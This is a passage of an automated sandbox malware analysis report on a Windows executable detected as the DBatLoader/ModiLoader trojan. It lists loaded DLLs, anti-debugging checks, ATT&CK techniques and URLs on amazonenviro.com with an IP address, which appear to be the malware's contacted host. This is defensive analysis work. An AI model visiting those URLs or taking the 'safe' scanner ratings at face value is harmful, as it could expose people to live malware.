            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: JDQS879kiy.exeStatic file information: File size 1161216 > 1048576

            Data Obfuscation

            barindex
            Yara detected DBatLoader
            Source: Yara matchFile source: 0.2.JDQS879kiy.exe.23565a8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.JDQS879kiy.exe.2840000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.JDQS879kiy.exe.23565a8.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2622490407.0000000002356000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2636506576.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02858798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02858798
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_028432FC push eax; ret 0_2_02843338
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0286D2FC push 0286D367h; ret 0_2_0286D35F
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284635C push 028463B7h; ret 0_2_028463AF
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284635A push 028463B7h; ret 0_2_028463AF
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0286D0AC push 0286D125h; ret 0_2_0286D11D
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0286D1F8 push 0286D288h; ret 0_2_0286D280
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0286D144 push 0286D1ECh; ret 0_2_0286D1E4
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_028586B8 push 028586FAh; ret 0_2_028586F2
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02846736 push 0284677Ah; ret 0_2_02846772
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02846738 push 0284677Ah; ret 0_2_02846772
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284C4EC push ecx; mov dword ptr [esp], edx0_2_0284C4F1
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284D520 push 0284D54Ch; ret 0_2_0284D544
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284CB6C push 0284CCF2h; ret 0_2_0284CCEA
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285788C push 02857909h; ret 0_2_02857901
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_028568C6 push 02856973h; ret 0_2_0285696B
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_028568C8 push 02856973h; ret 0_2_0285696B
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285E9E8 push ecx; mov dword ptr [esp], edx0_2_0285E9ED
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285890E push 02858948h; ret 0_2_02858940
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285A917 push 0285A950h; ret 0_2_0285A948
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02858910 push 02858948h; ret 0_2_02858940
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285A918 push 0285A950h; ret 0_2_0285A948
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284C967 push 0284CCF2h; ret 0_2_0284CCEA
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02852EE0 push 02852F56h; ret 0_2_02852F4E
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0286BFA0 push 0286C1C8h; ret 0_2_0286C1C0
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02852FEC push 02853039h; ret 0_2_02853031
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02852FEB push 02853039h; ret 0_2_02853031
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02855DFC push ecx; mov dword ptr [esp], edx0_2_02855DFE
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0285A954
            Source: C:\Users\user\Desktop\JDQS879kiy.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_028458B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028458B4
            Source: JDQS879kiy.exe, 00000000.00000003.2200826171.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\JDQS879kiy.exeAPI call chain: ExitProcess graph end nodegraph_0-25837

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285F024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_0285F024
            Source: C:\Users\user\Desktop\JDQS879kiy.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02858798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02858798
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02845A78
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: GetLocaleInfoA,0_2_0284A790
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: GetLocaleInfoA,0_2_0284A744
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02845B84
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284918C GetLocalTime,0_2_0284918C
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0284B70C GetVersionExA,0_2_0284B70C

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts            		1
            Native API            		1
            Valid Accounts            		1
            Valid Accounts            		1
            Valid Accounts            		OS Credential Dumping1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Access Token Manipulation            		1
            Access Token Manipulation            		LSASS Memory1
            Query Registry            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Virtualization/Sandbox Evasion            		Security Account Manager111
            Security Software Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information            		NTDS1
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture113
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information            		LSA Secrets1
            System Network Connections Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials1
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync24
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            JDQS879kiy.exe79%VirustotalBrowse
            JDQS879kiy.exe68%ReversingLabsWin32.Trojan.ModiLoader

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://amazonenviro.com/245_Nsltarpnconb0%Avira URL Cloudsafe
            https://amazonenviro.com/0X_60%Avira URL Cloudsafe
            https://amazonenviro.com/Qu0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpncona0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon$0%Avira URL Cloudsafe
            https://amazonenviro.com/F0%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconU0%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconnR0%Avira URL Cloudsafe
            https://amazonenviro.com/0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpnconh0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpncon0%Avira URL Cloudsafe
            https://amazonenviro.com/60%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_NsltarpnconS0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon20%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconzR~0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpnconr0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncont0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon(u0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon50%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpncon10%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpncon$0%Avira URL Cloudsafe
            https://amazonenviro.com/&0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpncon&0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon00%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpnconru0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_NsltarpncontDs0%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconRS0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon6r0%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconrTw0%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconYu0%Avira URL Cloudsafe
            https://amazonenviro.com/V0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpncon90%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpncon40%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpnconax0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            s-part-0017.t-0009.fb-t-msedge.net
            		13.107.253.45
            		truefalse
              		high
              amazonenviro.com
              		166.62.27.188
              		truefalse
                		high
                time.windows.com
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://amazonenviro.com/245_Nsltarpncontrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://amazonenviro.com/245_NsltarpnconUJDQS879kiy.exe, 00000000.00000003.1427699073.00000000005E8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/0X_6JDQS879kiy.exe, 00000000.00000003.2491979237.000000000060A000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.1493484348.000000000060A000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.1607710689.0000000000609000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2200133806.000000000060A000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000002.2621413099.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/QuJDQS879kiy.exe, 00000000.00000003.1427699073.00000000005E8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/FJDQS879kiy.exe, 00000000.00000003.1493484348.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/245_NsltarpnconbJDQS879kiy.exe, 00000000.00000003.2199981648.000000000062E000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2217070241.000000000062E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/245_NsltarpnconnRJDQS879kiy.exe, 00000000.00000003.2200133806.00000000005F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/245_Nsltarpncon$JDQS879kiy.exe, 00000000.00000003.1427699073.00000000005E8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com:443/245_NsltarpnconaJDQS879kiy.exe, 00000000.00000003.1810514593.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/245_NsltarpnconhJDQS879kiy.exe, 00000000.00000003.2199981648.000000000062E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/JDQS879kiy.exe, 00000000.00000002.2621413099.000000000060A000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2216997321.0000000000640000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000002.2621413099.000000000055E000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com:443/245_NsltarpnconJDQS879kiy.exe, 00000000.00000002.2621413099.000000000055E000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/6JDQS879kiy.exe, 00000000.00000003.1493484348.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com:443/245_NsltarpnconSJDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/245_Nsltarpncon2JDQS879kiy.exe, 00000000.00000003.1493484348.0000000000614000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/245_NsltarpnconzR~JDQS879kiy.exe, 00000000.00000002.2621413099.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2491979237.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.1493484348.00000000005F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/245_NsltarpncontJDQS879kiy.exe, 00000000.00000003.1493484348.00000000005F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com:443/245_NsltarpnconrJDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/245_Nsltarpncon5JDQS879kiy.exe, 00000000.00000003.2199981648.000000000062E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com:443/245_Nsltarpncon1JDQS879kiy.exe, 00000000.00000003.1810514593.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/245_Nsltarpncon(uJDQS879kiy.exe, 00000000.00000003.2491979237.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2200133806.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000002.2621413099.00000000005E5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/&JDQS879kiy.exe, 00000000.00000003.1427699073.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.1493484348.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://amazonenviro.com/fJDQS879kiy.exe, 00000000.00000002.2621413099.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://amazonenviro.com:443/245_Nsltarpncon$JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_Nsltarpncon0JDQS879kiy.exe, 00000000.00000003.1493484348.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2217070241.000000000062E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com:443/245_Nsltarpncon&JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com:443/245_NsltarpncontDsJDQS879kiy.exe, 00000000.00000002.2621413099.000000000055E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_NsltarpnconruJDQS879kiy.exe, 00000000.00000002.2621413099.00000000005E5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_NsltarpnconRSJDQS879kiy.exe, 00000000.00000003.1607710689.00000000005F2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_NsltarpnconHJDQS879kiy.exe, 00000000.00000003.2200826171.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.1493484348.00000000005F5000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://amazonenviro.com/245_NsltarpnconrTwJDQS879kiy.exe, 00000000.00000003.1427699073.00000000005E8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://amazonenviro.com/245_Nsltarpncon6rJDQS879kiy.exe, 00000000.00000003.1607710689.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2491979237.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://amazonenviro.com/245_NsltarpnconYuJDQS879kiy.exe, 00000000.00000003.2491979237.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://amazonenviro.com:443/245_Nsltarpncon9JDQS879kiy.exe, 00000000.00000003.1810514593.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://amazonenviro.com/VJDQS879kiy.exe, 00000000.00000003.1493484348.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://amazonenviro.com:443/245_Nsltarpncon4JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://amazonenviro.com/245_NsltarpnconaxJDQS879kiy.exe, 00000000.00000002.2635679583.00000000205E6000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      166.62.27.188
                      		amazonenviro.comUnited States
                      		26496AS-26496-GO-DADDY-COM-LLCUSfalse

                      General Information

                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1590518
                      Start date and time:2025-01-14 08:23:08 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 25s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:7
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:JDQS879kiy.exe
                      renamed because original name is a hash value
